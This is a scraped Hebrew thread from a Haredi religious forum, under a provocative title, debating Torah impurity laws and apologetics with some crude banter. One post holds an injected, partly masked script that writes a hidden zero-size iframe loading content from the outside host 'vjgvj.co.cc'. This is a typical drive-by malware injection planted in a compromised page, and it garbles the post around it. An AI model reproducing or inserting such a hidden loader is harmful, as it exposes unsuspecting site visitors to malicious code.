בית פורומים עצור כאן חושבים

המדריך ההלכתי לזונה ישראלית במסיבה של גויים

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-3/8/2011 17:13 לינק ישיר 

מעניין מה מראה לנו העובדה שהתנ"ך מדבר על הלכות טומאה למי ששוכב עם נידה/זבה וכן מי שאוכל נבלה.

דדווח על תוכן פוגעני

נשלח ב-3/8/2011 17:40 לינק ישיר 

נוכח, התורה דיברה בהווה מה דינו של שוכב עם אשה שנעשתה זבה או נדה תוך כדי מעשה . וכן לאכילת נבילה שמטמאה גם אם קנו אותה במונסי בהכשר... . וזאת למרות ובפרט ששללו מעשים אלו בכוונה תחילה. לגופו של אשכול ברור שלחכמינו היתה מומחיות למצוא קווי קיצון בדוגמאות שנקטו שכנראה עזרו להם לשנן את ההלכות ולזוכרן אולם מצאנו בסנהדרין ביטוי חריף על אחד שהגזים עם זה ( הביטוי הוא קבסתן למרות שארתח נקט השבוע באחד האשכולות דוגמא זו שעליה הגיב רבו של השואל בלשון צער זו , מסתמא לא דק) .

דדווח על תוכן פוגעני

נשלח ב-3/8/2011 18:24 לינק ישיר 

פי האתון,
אני לא מקבל את האפולוגיה שלך, אבל לא מצליח להצביע על כשל ספציפי. רק "לא נראה לי".
חילך לאפולוגטיקא!

דדווח על תוכן פוגעני

נשלח ב-3/8/2011 19:29 לינק ישיר 

מיימוני כתב:
ליצנות למה לי? קודם נשמע אם יש פה משהו שהליצנות מותרת בו. ובכל מקרה, בא חבר יקר, כותב מליבו, לא חייבים להסכים, אבל רק בדרך ארץ.

שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

כיהודה ועוד לקרא התם "מהסיפור על החכם והתם" מרגלא בפומיה 'רק בלי ליצנות' ודפח"ח.

דדווח על תוכן פוגעני

נשלח ב-3/8/2011 21:48 לינק ישיר 

שותפי,

לנשים וקטנים בלבד.

נלמד עליך זכות שקולמוסך פלט שלא בכוונה.

אמשלום,

לא שמת לב?

פרזנט,

לא ירדתי לסוף דעתך.

תוקן על ידי ייתכן ב- 03/08/2011 21:50:05

דדווח על תוכן פוגעני

נשלח ב-3/8/2011 22:00 לינק ישיר 

ייתכן כתב:

שותפי,
לנשים וקטנים בלבד.
נלמד עליך זכות שקולמוסך פלט שלא בכוונה.

מויחל טויבעס.
גם סכסכן, נוסף לכל ?

דדווח על תוכן פוגעני

נשלח ב-4/8/2011 06:57 לינק ישיר 

השכן כתב:
[אמשלום, "אוהד מתוסכל"? מי שצועק מהיציע "אני הייתי מבקיע את הבעיטה הזו" הוא אוהד חנון עם משקפיים עגולים ומראה של שמאלני. אוהד אמיתי מדבר קודם כל על האמא של השופט, שכידוע קשורה היטב לנושא האשכול!!]

[אכן, ניצחתני ]

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > המדריך ההלכתי לזונה ישראלית במסיבה של גויים
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
לדף הקודם 1 2 סך הכל 2 דפים.

bholext
2009 © כל הזכויות שמורות לבחדרי חרדים. קטגוריית אקטואליה וחדשות: עשרות פורומים הכוללים חדשות נעייס, מה קורה בחצרות חסידים, חדשות מחסידויות שונות בארץ ובעולם, דיונים בנושאי אקטואליה, פוליטיקה, בטחון ועוד.